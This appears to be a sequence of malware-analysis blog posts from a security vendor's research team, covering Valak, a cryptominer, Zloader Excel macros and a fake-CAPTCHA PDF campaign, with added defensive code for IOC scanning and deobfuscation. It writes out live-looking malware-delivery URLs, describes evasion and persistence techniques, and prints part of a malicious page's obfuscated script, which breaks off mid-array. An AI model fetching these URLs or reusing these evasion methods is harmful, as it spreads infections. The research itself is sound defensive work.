Valak Initial Infection

Overview:

SonicWall Capture Labs Threat Research Team recently observed new activity for Valak. The Valak malware campaign is usually found lurking in your email inbox or spam folder. Valak is distributed as an email with a password-protected zip attachment containing a Microsoft Office-related document. Over the last six months or so, Valak has switched from password-protected zip files to HTTP hyperlinks.

An example of the HTTP hyperlink:
http://centruldeinfoliere.ro/_qRlDMkyWtPIbz7M5.php?x=MDAwMyBNY5KWcZGMy8k0oIxYUVH2_-u1yUh7ZePvmuNyclVUgcLADWz6g4R0fHir0QUTpjr0UBdTZZveY32hmH7Fx_mkyU3ULfkkoyPTm1HAbKKfvdiUO6QsABHKdzpaK9i6kwgErffcRV6BvyQKLhcSJA~~&y=Ry5fTWljaGFlbCdzX0Jpc3Ryb18mX0Jhci56aXA=
Files returned from the URL above, listed by SHA256 hash and file size:
– 691e4c75b51448ffb1cb031dea5950ce18fdc843a75a4775f82276c4838d071a File-size: 112,611 bytes
– d3486e1ed6f486f1ca391d9a7b03def818bc977dce3902436d176fa9f7e93289 File-size: 113,635 bytes
– 19cba4e01f15b628ebd46ac48c4b4a28c515c3bb1fd65572970e8b8701ebd874 File-size: 111,587 bytes

Example filename: G._Michael’s_Bistro_&_Bar.zip

SHA256 hashes and document names (the macro inside each sample delivers Valak):

Today we are going to peek inside the initial Valak DLL retrieved by the document macro. The same DLL is served from several other hyperlinks, listed below:

URLs that supply the Valak DLL from documents:

http://407.cd.gov.mn/_W54sEoZKl-m2w6RZ.php/?x=MDAwMSDquFjnnQfNskuQwXSFpyH0Z9_qXomuRTk0GI_JRu_fKoAz7nCHxvKoT8dz8tAtY6hCXcf7As15lmDc9hy783iLCvBjCDIJbjSKoo-yMGxsQeXacHaexrHhGtmbv6dHXB6EcntdaN8Mkiq-pA_sQw~~
https://bangrajan.org/wp-content/uploads/_m8CVdv47q2JCqgaq.php?x=MDAwMSD_acsCi6_1dic7V-Dk5gCE0DDV3NvQOyIDSnpYLVbLeUSOtixzS9j5_-xegs4j_zu5Lm49dFEVSaWhi1PlZnUr0Pw2gDPaJKfcHs2rPGyw94m8hYSKaHfJSB6c2WK5JcwPXSZMKLoHTbP2UWuljg~~
http://centruldeinfoliere.ro/_qRlDMkyWtPIbz7M5.php?x=MDAwMSDKSoJE5lV1GKwb4Ub-pzqjnaQZjzWFvlOnWNYSs9gYKoCD5q1mXjEObRFguTFtWGu6AKCDSBglzHJ-vYeohvLg55dXJ5Zue890q8jHP2jdoP1Tww5YIL58J7-m0i2BPW9hrbOVFEUAgh9TOtEJzQ~~


DLL Sample Layer, Static Information:

Looking at the first layer in CFF Explorer and checking for corruption: the first layer is a native Windows DLL binary.

Static Command-Line Information:

Dynamic Information:

PDB Information:

Dll Main:

Exports:

Inside Wiredifficult:

Obfuscated Buffer:

Call to decode buffer:

This is where the decrypted buffer is called (call ESI):

After stepping through the call to ESI, the shellcode will build out a small hidden call table as seen below:

Getting there involves following a variety of calls to VirtualAlloc and dumping modules, full binaries, regions, and custom partial memory regions. You will also have to clear the hurdle of bypassing INT3 calls to arrive at the fully decrypted MZ binary in memory, shown below:

Fully Decrypted:

After the decryption, you will see an Import Address Table get assembled
(take notice of CreateFileA and WinExec, the 3rd and 6th entries):

If you did everything correctly, at this point you should see a new native DLL binary:

Network Artifacts:

DECOY DOMAINS FOR VALAK C2:

– dev.visualwebsiteoptimizer.com
– rad.msn.com.nsatc.net
– tss-geotrust-crl.thawte.com

MALICIOUS DOMAINS FOR VALAK C2:

– 95.169.182.116 port 80 – delandwinebar.com
– 95.169.182.116 port 80 – yongcan0f.com
– 2020aix.com
– 31pces-walk.com
– 59siwf-farm.com
– 61wsov-ring.com

MALICIOUS DOMAINS FOR ICEDID:

– 165.227.64.184 port 443 – ldrhonda.casa
– 167.71.227.19 port 443 – sweeteator.best
– 167.71.227.19 port 443 – plutiasitop.top
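To make the indicator lists above actionable, here is an added example (not code from the SonicWall post) that scans proxy log lines for the Valak and IcedID C2 hosts and sockets listed above and treats the decoy domains as supporting context only. The log line format ("timestamp client-ip dst-ip:port host") and the sample lines are constructed assumptions for the example.

```javascript
// Added example, not from the SonicWall post: match the Valak and IcedID C2
// indicators from the post against proxy log lines. The log format is an
// assumption for this example ("<timestamp> <client-ip> <dst-ip>:<port> <host>");
// adapt parseLine() to your proxy's format.

const VALAK_C2 = {
  hosts: ['delandwinebar.com', 'yongcan0f.com', '2020aix.com',
          '31pces-walk.com', '59siwf-farm.com', '61wsov-ring.com'],
  sockets: ['95.169.182.116:80'],
};
const ICEDID_C2 = {
  hosts: ['ldrhonda.casa', 'sweeteator.best', 'plutiasitop.top'],
  sockets: ['165.227.64.184:443', '167.71.227.19:443'],
};
// Legitimate hosts Valak contacts as cover traffic: context, never an alert by itself.
const VALAK_DECOYS = ['dev.visualwebsiteoptimizer.com', 'rad.msn.com.nsatc.net',
                      'tss-geotrust-crl.thawte.com'];

const LINE_RE = /^(\S+)\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\s+(\S+)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  if (!m) return null; // malformed lines are skipped, not treated as hits
  return { ts: m[1], client: m[2], socket: `${m[3]}:${m[4]}`, host: m[5].toLowerCase() };
}

// True when host equals an indicator or is a subdomain of one
// (www.2020aix.com matches 2020aix.com; not2020aix.com does not).
function hostMatches(host, indicators) {
  return indicators.some(d => host === d || host.endsWith('.' + d));
}

function classify(rec) {
  if (hostMatches(rec.host, VALAK_C2.hosts) || VALAK_C2.sockets.includes(rec.socket)) return 'valak-c2';
  if (hostMatches(rec.host, ICEDID_C2.hosts) || ICEDID_C2.sockets.includes(rec.socket)) return 'icedid-c2';
  if (hostMatches(rec.host, VALAK_DECOYS)) return 'valak-decoy';
  return null;
}

// Group hits per client. A client is alerted on only for C2 contact; decoy
// contacts are attached as supporting context, since Valak mixes both.
function scanLogs(lines) {
  const perClient = new Map();
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const verdict = classify(rec);
    if (!verdict) continue;
    if (!perClient.has(rec.client)) perClient.set(rec.client, { c2: [], decoys: [] });
    const bucket = perClient.get(rec.client);
    (verdict === 'valak-decoy' ? bucket.decoys : bucket.c2).push({ ...rec, verdict });
  }
  const alerts = [];
  for (const [client, b] of perClient) {
    if (b.c2.length === 0) continue;
    alerts.push({
      client,
      families: [...new Set(b.c2.map(h => h.verdict))].sort(),
      c2Hits: b.c2.length,
      decoyContacts: b.decoys.length,
      firstSeen: b.c2[0].ts,
    });
  }
  return alerts;
}

// Constructed sample log lines (not real traffic).
const SAMPLE_LOGS = [
  '2020-07-10T09:12:01Z 10.0.0.5 104.16.0.10:443 dev.visualwebsiteoptimizer.com',
  '2020-07-10T09:12:03Z 10.0.0.5 95.169.182.116:80 delandwinebar.com',
  '2020-07-10T09:12:09Z 10.0.0.5 203.0.113.7:443 www.2020aix.com',
  '2020-07-10T09:13:00Z 10.0.0.7 104.16.0.11:443 tss-geotrust-crl.thawte.com',
  '2020-07-10T09:14:30Z 10.0.0.9 167.71.227.19:443 sweeteator.best',
  '2020-07-10T09:15:00Z 10.0.0.9 93.184.216.34:443 example.com',
  'garbage line that does not parse',
];

console.log(JSON.stringify(scanLogs(SAMPLE_LOGS), null, 2));
```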

Supported Systems:

  • Windows 10
  • Windows 8.1
  • Windows 8.0
  • Windows 7
  • Windows Vista

SonicWall Gateway Anti-Virus (GAV) provides protection against this threat:

  • GAV: Valak.AG

Appendix:

Sample SHA256 Hash: fd44086fe5fd433c14f4fc1e03f318353add50ac77dee6da3f64c4d2c5414c1c
File Location: http://detayworx.com/_vsnpNgyXp84Os8Xh.php?x=MDAwMSD7k0uWF2BKCkQGuSvAXqzhVD7pPpu-mirofSGC48QkKx26TywMByaP_nQjE_2EZXGfKy_H-gb2d-aDRgRbUwBi0XgbtTnVlugs38r3vI298UWyMzmQsvid4SyXJOUkCK4dpXj6mXuT7tTBXC3_-w~~

Another cryptominer trojan riding the Coronavirus wave

The pandemic has brought the world to a standstill but has not deterred cybercriminals. It has been a boon to malware authors and has provided them a platform to exploit. The SonicWall Capture Labs Research team has analyzed yet another cryptominer riding the Coronavirus wave. It comes fully featured and capable of killing and deleting files, connecting to remote servers and downloading additional files, manipulating access controls and file attributes, and changing network configuration, among many other things.

Infection Cycle:

The file comes as a WinRAR self-extracting archive and uses the following icon:

Within the archive is another self-extracting archive named upx.exe which contains the following files:

  • %temp%/c3.bat
  • %temp%/excludes
  • %temp%/n.vbs

n.vbs executes c3.bat using Windows Script Host, the default host for executing scripts written in a variety of languages.

The excludes file contains the mining config:

C3.bat is the main installer file, which performs a myriad of malicious actions including killing and deleting files, connecting to remote servers, and changing system policies, among many others.

C3.bat starts by deleting existing users and disabling running services:

It then changes the file attributes of executable files within the following directories:

It then kills possibly running rival cryptominers:

And then deletes them along with known remote desktop applications:

It then changes access controls to executable files:

It then adds the following registry keys, which cause regsvr32.exe to be passed the location of a remote file that is in turn registered as a COM object every time the infected machine starts up:

To ensure uninterrupted execution it modifies the network configuration:

And to establish persistence on the infected machine, it creates WMI event subscriptions using event handler names such as “coronav” and “coronav2”.

When the event fires, it downloads more of the same files from remote servers, which ensures the infection is reinstated in several different ways.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Coinminer.BT (Trojan)
  • GAV: Downloader.BAT_4 (Trojan)

This threat is also detected by SonicWALL Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 07-10-20

This week, phishing dominated the headlines, as threat actors targeted Office 365 users and senior executives.


SonicWall Spotlight

Contact tracing apps: “It’s better to do it right than quick” — Verdict

  • This podcast on contact tracing technology includes commentary from Bill Conner, who discusses different types of security policies and why security and privacy are of paramount importance.

‘Our direct-touch approach is disrupting the market’ – SonicWall’s new Ireland boss on becoming more than just a firewall vendor — Channel Partner Insight (UK)

  • Ireland Country Manager Tristan Bateup said SonicWall’s channel team in Ireland has been restructured to bring more roles into the country. “We’ve now got people in place in country from a sales and marketing, sales and engineering and obviously a country lead perspective.”

Cybersecurity News

Over 5 Billion Unique Credentials Offered on Cybercrime Marketplaces — Security Week

  • More than 15 billion username and password pairs have been offered on cybercrime marketplaces, including over 5 billion unique credentials.

Researchers connect Evilnum hacking group to cyberattacks against Fintech firms — The Register

  • New report puts a microscope on Evilnum, including its tools, techniques and potential ties to other cyberattackers.

Conti ransomware uses 32 simultaneous CPU threads for blazing-fast encryption — ZDNet

  • The Conti ransomware also abuses the Windows Restart Manager component to unlock apps and free up their data for encryption.

Persuasive Office 365 phishing uses fake Zoom suspension alerts — Bleeping Computer

  • A new phishing campaign targets Microsoft Office 365 corporate users with notices that their Zoom accounts have been suspended, with the end goal of stealing Office 365 logins.

Citrix tells everyone not to worry too much over its latest security patches. NSA’s former top hacker disagrees — The Register

  • Rob Joyce, former head of the NSA’s Tailored Access Operations elite hacking team, warns it’s time for admins to get busy to ensure protection from several exploitable issues, including unauthenticated access and RCE.

Vast Phishing Campaign Hits Microsoft Users in 62 Countries — Bloomberg

  • Microsoft Corp. customers were targeted in a massive phishing campaign that has sought to defraud users in 62 countries since December, with recent emails attempting to exploit the pandemic.

North Korean hackers linked to web skimming (Magecart) attacks, report says — ZDNet

  • After hacking banks and cryptocurrency exchanges, orchestrating ATM cash-outs, and deploying ransomware, North Korean hackers have now set their sights on online stores.

Cerberus Banking Trojan Unleashed on Google Play — Threat Post

  • The Cerberus malware can steal banking credentials, bypass security measures and access text messages.

Looks Like Russian Hackers Are on an Email Scam Spree — Wired

  • A group dubbed “Cosmic Lynx” uses surprisingly sophisticated methods — and targets big game.

Hackers are trying to steal admin passwords from F5 BIG-IP devices — ZDNet

  • Threat actors have already started exploiting the F5 BIG-IP mega-bug, attempting to steal administrator passwords from the hacked devices.

New Mac ransomware is even more sinister than it appears — Ars Technica

  • ThiefQuest or EvilQuest can grab passwords and credit card numbers.

In Case You Missed It

Improvements in malicious Excel files distributing Zloader

SonicWall Capture Labs threat research team has been observing improvements in the MS Excel documents used to distribute ZLoader. Enhancements include techniques to evade detection by conventional signature-based anti-malware engines and to hinder debugging and analysis in the sandbox.

Evasion Technique:

In campaigns until now, victims were instructed to enable macros through instructions in either plain ASCII text or an image file, as shown in Fig-1, which made the documents easy to detect. To evade detection, the threat actors switched to a combination of ASCII and Unicode characters. When the file is searched for the strings displayed in the instruction, nothing is found. Careful inspection of the SST records shows that the message is hidden by cleverly interleaving Unicode look-alike characters with ASCII. For example, ‘O’ is represented by the Unicode character U+041E, and the whitespace character by U+00A0, as shown in Fig-2 and Fig-3.

Fig-1: Instructions to enable macros in an image

Fig-2: Instructions to enable macros appearing in text

Fig-3: Combination of characters from ASCII and another character set

Use of Null Character in Label Names:

In MS Excel, one can assign a human-readable name that refers to a single cell or a range of cells. What is notable in these documents is the use of NULL characters in the label names, which makes the names invisible in the functions that refer to them.


Fig-4: Label Record

In the example below, a label containing NULL characters is referred to by the FORMULA.FILL function:


Fig-5: FORMULA.FILL referring to a label with NULL characters


Macro Execution:

The analyzed sample has its Auto_open label in a hidden state. Upon execution, the macro builds further code at run time by concatenating characters, as shown below:

Fig-6: Obfuscated macro code

Deobfuscated code:


Fig-7: Deobfuscated macro code

Anti-Debugging:

The GET.WORKSPACE(type_num) function returns information about the workspace, where “type_num” specifies the type of information. “type_num” 31 identifies whether the currently running macro is in single-step mode. If this call returns TRUE, the sample terminates execution.

Anti-Sandbox:

Macros are usually enabled in a sandbox environment to allow unrestricted execution, which means the value of “vbawarnings” in the registry would be set to 1. To prevent easy execution and identification, the macro creates a VBS file with code that reads this value from the Windows registry.

  • HKCU\software\policies\microsoft\office\<Office_Version>\word\security
    • vbawarnings
      • 1 = Enable macros
      • 2 = Disable all with notification
      • 3 = Disable all except digitally signed macros
      • 4 = Disable all without notification

After successful verification, code specific to the “Processor_Architecture” is executed. It is interesting to see a different “User-Agent” string used in the HTTP request for each “Processor_Architecture”.

Fig-10: Macro code to download and execute the payload

SonicWall RTDMI protects against this threat as shown below:

Fig-11: Capture ATP report

Indicators of Compromise:

SHA256 of malicious Excel Documents:


Network Connection:

  • https://thepsaokhue.com/wp-keys.php
  • https://metagro.com.br/wp-keys.php
  • https://loughturnperceidrin.ml/wp-keys.php
  • https://joliroomlides.tk/wp-keys.php

Massive malspam campaign delivers malicious payloads using a fake CAPTCHA

SonicWall Capture Labs Threat Research team has come across a new malspam campaign that delivers what pretends to be a legitimate PDF but installs malware on the victim’s computer. When a user opens this PDF, they are shown a prompt that pretends to be a CAPTCHA asking them to confirm they are human. This is not a real Google reCAPTCHA but a fake image; clicking on it takes the user to a malicious web page.

The malspam targets users who open the PDF in a browser. When the user clicks the CAPTCHA image in Adobe Reader, they get a warning (see below) that the PDF is trying to connect to the internet. However, when the PDF is opened in a browser, clicking on the CAPTCHA takes the user to the malicious web page without any prompt or warning.

The malicious web page below runs JavaScript on the client side before redirecting the user to the payload delivery page. The name of the payload, “new+toeic+reading+test”, is appended to the URL.

This JavaScript is heavily obfuscated and uses anti-debugging techniques to protect the script from analysis. By placing the “debugger;” statement inside the code, it halts execution of the script whenever a debugger hits that instruction. It also implements bot detection ( botFound = 0x1; ) to avoid being analyzed by good bots such as Google Safe Browsing. The script is obfuscated using the String Array Rotation and RC4 encryption options.
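For readers following the script below, here is an added example (not code from the post or from the malicious page) that models how the String Array Rotation and RC4 options work, mirroring the decoder routine in the script (atob, percent-escape, decodeURIComponent, then RC4). The key, the plaintext strings and the sample array are constructed assumptions; the real script supplies a different key with each lookup.

```javascript
// Added example, not code from the post or from the malicious page: a working
// model of the obfuscator's String Array Rotation and RC4 string encoding,
// written to mirror the decoder routine in the script. Key and plaintext values
// are constructed for the example.

// Plain RC4 (KSA + PRGA) over byte buffers.
function rc4(keyStr, data) {
  const key = Buffer.from(keyStr, 'latin1');
  const S = Array.from({ length: 256 }, (_, i) => i);
  let j = 0;
  for (let i = 0; i < 256; i++) {
    j = (j + S[i] + key[i % key.length]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
  }
  const out = Buffer.alloc(data.length);
  let i = 0;
  j = 0;
  for (let k = 0; k < data.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + S[i]) & 0xff;
    [S[i], S[j]] = [S[j], S[i]];
    out[k] = data[k] ^ S[(S[i] + S[j]) & 0xff];
  }
  return out;
}

// Decoder as the script does it: base64 -> bytes, then the percent-escape /
// decodeURIComponent dance (which is simply a UTF-8 decode), then RC4 over the
// resulting 8-bit code units.
function decodeString(encoded, key) {
  const cipherUnits = Buffer.from(encoded, 'base64').toString('utf8');
  return rc4(key, Buffer.from(cipherUnits, 'latin1')).toString('latin1');
}

// Inverse, used here only to build the constructed sample array: RC4, treat
// each cipher byte as a code point, UTF-8 encode, base64. This is why the
// array entries decode from base64 to UTF-8 sequences rather than raw bytes.
function encodeString(plain, key) {
  const cipherBytes = rc4(key, Buffer.from(plain, 'latin1'));
  return Buffer.from(cipherBytes.toString('latin1'), 'utf8').toString('base64');
}

// String Array Rotation: the self-invoking wrapper performs `count` rounds of
// push(shift()), i.e. a left rotation by count mod length. The script passes
// 0xe1 as the count.
function rotateArray(arr, count) {
  const shift = count % arr.length;
  return arr.slice(shift).concat(arr.slice(0, shift));
}

// Analyst-side recovery: rotate once, then decode every entry. The index used
// by the script's lookup function refers to the post-rotation array.
function recoverStrings(storedArray, rotateCount, key) {
  return rotateArray(storedArray, rotateCount).map(e => decodeString(e, key));
}

// Constructed sample: plausible plaintexts, stored pre-rotated so that
// rotating 0xe1 times restores the order the code indexes into.
const SAMPLE_KEY = 'k3y';   // assumption for the example
const ROTATE_COUNT = 0xe1;  // the count used by the script's wrapper
const PLAIN_STRINGS = ['debugger', 'botFound', 'location', 'href', 'navigator', 'userAgent', 'webdriver'];
const runtimeOrder = PLAIN_STRINGS.map(s => encodeString(s, SAMPLE_KEY));
const back = runtimeOrder.length - (ROTATE_COUNT % runtimeOrder.length);
const STORED_ARRAY = runtimeOrder.slice(back).concat(runtimeOrder.slice(0, back));

console.log(recoverStrings(STORED_ARRAY, ROTATE_COUNT, SAMPLE_KEY));
```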

<!DOCTYPE html>
<html>
<head>
<title></title>
<script type="text/javascript">
{
var _0x5b05 = [‘\x77\x71\x50\x44\x69\x69\x56\x56\x63\x73\x4b\x6b\x50\x73\x4b\x53’, ‘\x45\x63\x4b\x66\x48\x67\x30\x65’, ‘\x58\x4d\x4f\x65\x77\x37\x6e\x43\x74\x38\x4f\x35\x77\x37\x54\x43\x74\x67\x3d\x3d’, ‘\x77\x6f\x58\x44\x69\x47\x76\x44\x6a\x69\x49\x3d’, ‘\x77\x71\x7a\x44\x75\x55\x2f\x44\x74\x79\x38\x3d’, ‘\x77\x70\x4d\x62\x77\x6f\x4e\x50\x77\x6f\x30\x3d’, ‘\x77\x70\x56\x41\x45\x73\x4b\x59\x77\x70\x77\x3d’, ‘\x77\x35\x52\x35\x77\x37\x58\x43\x76\x53\x49\x3d’, ‘\x43\x4d\x4b\x49\x77\x36\x74\x69\x77\x6f\x4e\x46\x77\x72\x4c\x43\x6d\x6b\x59\x3d’, ‘\x77\x34\x54\x43\x6b\x73\x4f\x41\x56\x38\x4b\x6e’, ‘\x51\x4d\x4f\x6c\x77\x35\x7a\x43\x74\x38\x4f\x66’, ‘\x65\x38\x4b\x6c\x77\x35\x62\x43\x73\x6d\x2f\x44\x75\x4d\x4b\x45’, ‘\x50\x32\x76\x43\x73\x38\x4f\x67\x47\x67\x3d\x3d’, ‘\x77\x34\x37\x43\x75\x63\x4b\x48\x44\x6d\x38\x3d’, ‘\x77\x37\x34\x73\x54\x47\x49\x3d’, ‘\x61\x67\x5a\x4f\x77\x37\x5a\x35’, ‘\x77\x70\x4c\x44\x6c\x32\x62\x43\x6d\x42\x52\x4d\x77\x36\x48\x44\x6c\x58\x63\x3d’, ‘\x77\x72\x4c\x44\x71\x7a\x46\x32\x51\x51\x3d\x3d’, ‘\x77\x72\x4e\x71\x45\x4d\x4f\x49\x59\x67\x3d\x3d’, ‘\x46\x47\x33\x43\x70\x4d\x4f\x5a\x4c\x51\x3d\x3d’, ‘\x77\x72\x58\x43\x69\x4d\x4b\x50\x77\x6f\x64\x30\x5a\x41\x62\x44\x72\x67\x3d\x3d’, ‘\x4d\x4d\x4b\x7a\x43\x68\x55\x69\x41\x63\x4f\x33\x77\x34\x4c\x43\x6e\x79\x73\x4d’, ‘\x77\x34\x39\x32\x77\x36\x37\x44\x74\x77\x34\x3d’, ‘\x77\x70\x44\x44\x6b\x67\x56\x34\x63\x41\x3d\x3d’, ‘\x52\x6e\x46\x53\x4f\x4d\x4b\x72\x4d\x4d\x4b\x73\x77\x37\x55\x3d’, ‘\x56\x58\x6f\x6e\x77\x37\x54\x44\x74\x41\x3d\x3d’, ‘\x77\x70\x4a\x38\x62\x63\x4b\x51\x77\x6f\x59\x3d’, ‘\x45\x73\x4f\x51\x77\x70\x31\x55\x42\x67\x3d\x3d’, ‘\x53\x63\x4f\x70\x77\x35\x72\x44\x6e\x69\x6b\x3d’, ‘\x77\x37\x48\x43\x72\x63\x4b\x63\x42\x48\x6b\x3d’, ‘\x77\x70\x70\x47\x58\x52\x4c\x44\x73\x67\x3d\x3d’, ‘\x77\x71\x4a\x32\x48\x63\x4f\x56\x58\x67\x3d\x3d’, ‘\x77\x36\x66\x43\x71\x38\x4f\x50\x49\x63\x4b\x37’, ‘\x77\x72\x66\x43\x76\x63\x4f\x73\x77\x70\x70\x77’, ‘\x4e\x38\x4f\x55\x59\x73\x4b\x67\x77\x70\x6f\x3d’, 
‘\x77\x72\x63\x67\x77\x71\x4e\x74\x77\x71\x77\x3d’, ‘\x50\x42\x62\x44\x6c\x38\x4b\x66\x77\x37\x63\x3d’, ‘\x47\x38\x4b\x56\x77\x36\x6c\x6d\x77\x6f\x56\x64\x77\x71\x34\x3d’, ‘\x77\x6f\x35\x2b\x4e\x4d\x4b\x4b\x77\x72\x49\x3d’, ‘\x66\x30\x78\x46\x4f\x73\x4b\x47’, ‘\x4d\x73\x4b\x4e\x77\x37\x4e\x4d\x77\x6f\x45\x3d’, ‘\x77\x35\x4c\x44\x6d\x73\x4f\x7a\x47\x7a\x34\x3d’, ‘\x48\x4d\x4b\x6b\x45\x69\x73\x66’, ‘\x77\x71\x42\x35\x65\x4d\x4b\x61\x77\x72\x77\x3d’, ‘\x77\x72\x54\x44\x69\x68\x74\x52\x61\x63\x4b\x68\x4e\x51\x3d\x3d’, ‘\x77\x70\x56\x6d\x52\x52\x50\x44\x69\x51\x3d\x3d’, ‘\x65\x73\x4b\x7a\x77\x34\x66\x43\x6a\x58\x45\x3d’, ‘\x77\x36\x51\x6b\x50\x73\x4b\x45\x57\x51\x3d\x3d’, ‘\x4b\x38\x4b\x52\x42\x7a\x51\x6d\x77\x71\x54\x44\x72\x43\x38\x3d’, ‘\x77\x34\x4e\x75\x77\x36\x7a\x43\x75\x41\x59\x3d’, ‘\x77\x36\x48\x43\x75\x63\x4f\x4d\x4a\x63\x4b\x6a\x53\x4d\x4f\x34\x64\x41\x3d\x3d’, ‘\x46\x78\x31\x78\x77\x37\x4a\x67\x77\x37\x50\x43\x70\x63\x4f\x68’, ‘\x66\x58\x74\x76\x77\x37\x7a\x44\x6c\x55\x59\x39\x4e\x63\x4b\x38’, ‘\x77\x6f\x78\x4b\x50\x38\x4f\x55\x58\x51\x3d\x3d’, ‘\x51\x47\x4e\x75\x77\x37\x2f\x44\x6c\x41\x3d\x3d’, ‘\x4e\x78\x42\x53\x77\x34\x4a\x52’, ‘\x77\x6f\x45\x2b\x77\x72\x6c\x67\x77\x71\x59\x3d’, ‘\x77\x34\x44\x44\x67\x4d\x4f\x4a\x41\x78\x77\x3d’, ‘\x4d\x73\x4f\x69\x77\x36\x70\x66\x77\x72\x38\x3d’, ‘\x56\x38\x4b\x46\x77\x36\x50\x43\x71\x56\x67\x3d’, ‘\x77\x71\x2f\x43\x69\x63\x4f\x63\x77\x70\x5a\x6e’, ‘\x77\x35\x76\x43\x6c\x4d\x4b\x41\x58\x68\x68\x44\x48\x73\x4b\x35\x53\x41\x3d\x3d’, ‘\x4e\x33\x58\x43\x71\x73\x4f\x34’, ‘\x4e\x63\x4f\x56\x64\x38\x4b\x72\x77\x72\x50\x43\x68\x67\x3d\x3d’, ‘\x77\x72\x67\x66\x77\x72\x70\x5a\x77\x6f\x34\x3d’, ‘\x77\x35\x37\x44\x72\x38\x4f\x72\x59\x44\x67\x3d’, ‘\x77\x70\x66\x44\x76\x38\x4f\x6d\x46\x77\x3d\x3d’, ‘\x77\x34\x76\x44\x71\x38\x4f\x47’, ‘\x77\x36\x38\x6b\x41\x54\x52\x6d’, ‘\x77\x36\x73\x6b\x47\x53\x52\x62’, ‘\x77\x72\x44\x44\x68\x63\x4f\x6f\x4b\x38\x4f\x4c’, 
‘\x77\x36\x45\x37\x44\x45\x4c\x43\x72\x4d\x4b\x42\x77\x35\x50\x43\x6a\x38\x4b\x6a’, ‘\x77\x34\x72\x43\x74\x63\x4f\x41\x56\x77\x3d\x3d’, ‘\x53\x73\x4f\x43\x77\x35\x54\x44\x6b\x77\x77\x3d’, ‘\x4c\x6d\x4c\x43\x74\x4d\x4f\x4c\x4a\x51\x3d\x3d’, ‘\x77\x71\x58\x43\x69\x4d\x4b\x2f\x77\x6f\x5a\x72\x61\x41\x62\x44\x76\x51\x3d\x3d’, ‘\x47\x38\x4f\x69\x41\x6a\x34\x59’, ‘\x77\x35\x70\x4f\x77\x37\x54\x44\x72\x77\x34\x3d’, ‘\x42\x77\x44\x44\x70\x38\x4b\x74\x77\x34\x6a\x44\x6b\x31\x4d\x76\x77\x6f\x73\x3d’, ‘\x77\x34\x73\x2f\x42\x52\x35\x63\x77\x36\x49\x6f\x77\x71\x51\x55\x62\x38\x4f\x6a\x4d\x73\x4b\x54\x51\x32\x50\x44\x6e\x43\x4a\x66\x77\x35\x68\x78’, ‘\x64\x43\x52\x4a\x77\x36\x39\x55\x77\x6f\x31\x4f\x77\x35\x33\x44\x6e\x77\x3d\x3d’, ‘\x4f\x78\x58\x44\x6a\x63\x4b\x38\x77\x72\x73\x3d’, ‘\x52\x58\x52\x2f\x4e\x41\x3d\x3d’, ‘\x4b\x58\x58\x43\x6b\x73\x4f\x62\x44\x51\x3d\x3d’, ‘\x64\x33\x34\x7a\x77\x35\x72\x44\x69\x67\x3d\x3d’, ‘\x62\x6d\x68\x73\x77\x36\x54\x44\x71\x6c\x6f\x6c\x4b\x38\x4b\x74\x77\x6f\x6e\x44\x70\x51\x3d\x3d’, ‘\x49\x4d\x4b\x4e\x4e\x78\x55\x58’, ‘\x77\x36\x5a\x4d\x77\x35\x48\x44\x6a\x77\x59\x3d’, ‘\x41\x47\x41\x43\x52\x79\x6a\x43\x72\x73\x4f\x6e’, ‘\x45\x41\x42\x42’, ‘\x77\x34\x38\x4a\x4f\x73\x4b\x54\x58\x41\x3d\x3d’, ‘\x77\x71\x6a\x44\x68\x38\x4f\x37\x54\x69\x55\x3d’, ‘\x4f\x73\x4b\x75\x4c\x54\x77\x7a’, ‘\x44\x38\x4f\x31\x77\x37\x52\x69\x77\x70\x6f\x3d’, ‘\x77\x72\x62\x44\x69\x63\x4b\x65\x57\x41\x3d\x3d’, ‘\x62\x43\x52\x44\x77\x37\x30\x3d’, ‘\x50\x31\x6c\x2b\x77\x71\x30\x79\x77\x72\x44\x44\x6f\x38\x4b\x35\x77\x71\x30\x72\x77\x34\x6a\x44\x6e\x7a\x64\x30\x77\x36\x39\x66\x48\x38\x4f\x39\x77\x72\x48\x44\x6d\x33\x51\x49\x4c\x38\x4b\x74\x77\x6f\x4a\x33\x4f\x51\x64\x32\x77\x36\x6a\x43\x74\x73\x4b\x45\x57\x6b\x38\x3d’, ‘\x77\x34\x52\x62\x77\x37\x37\x44\x6f\x54\x54\x43\x70\x63\x4b\x68\x77\x6f\x30\x3d’, ‘\x58\x33\x59\x37\x77\x36\x44\x44\x71\x51\x3d\x3d’, ‘\x77\x6f\x5a\x51\x5a\x73\x4b\x61\x77\x72\x38\x3d’, ‘\x65\x4d\x4b\x38\x63\x57\x34\x70’, ‘\x47\x38\x4f\x58\x46\x51\x59\x78’, 
‘\x77\x71\x66\x44\x6c\x38\x4f\x78\x46\x63\x4f\x53’, ‘\x77\x70\x6c\x58\x77\x37\x6e\x44\x71\x43\x56\x4d\x57\x33\x6e\x44\x76\x77\x3d\x3d’, ‘\x77\x35\x37\x43\x6c\x63\x4b\x4b\x57\x44\x5a\x51\x41\x73\x4b\x6e\x57\x51\x3d\x3d’, ‘\x77\x37\x76\x43\x75\x38\x4f\x57\x4b\x38\x4b\x2f’, ‘\x77\x72\x56\x45\x4e\x38\x4b\x65\x77\x6f\x49\x3d’, ‘\x77\x36\x6e\x43\x76\x63\x4b\x68\x56\x54\x34\x3d’, ‘\x77\x6f\x6c\x54\x58\x52\x4c\x44\x71\x6e\x58\x44\x75\x51\x3d\x3d’, ‘\x77\x72\x2f\x43\x74\x38\x4f\x76\x77\x6f\x78\x4d’, ‘\x77\x35\x59\x48\x42\x44\x64\x4a’, ‘\x44\x42\x48\x44\x76\x38\x4b\x66\x77\x6f\x33\x44\x6b\x4d\x4f\x76\x52\x67\x3d\x3d’, ‘\x77\x36\x48\x43\x73\x4d\x4b\x59\x4b\x45\x66\x44\x6b\x38\x4f\x7a\x61\x51\x3d\x3d’, ‘\x65\x57\x5a\x54\x77\x37\x7a\x44\x69\x46\x73\x71\x49\x67\x3d\x3d’, ‘\x77\x72\x72\x44\x6f\x73\x4b\x52\x63\x4d\x4b\x6c’, ‘\x77\x6f\x4a\x65\x53\x77\x66\x44\x6d\x51\x3d\x3d’, 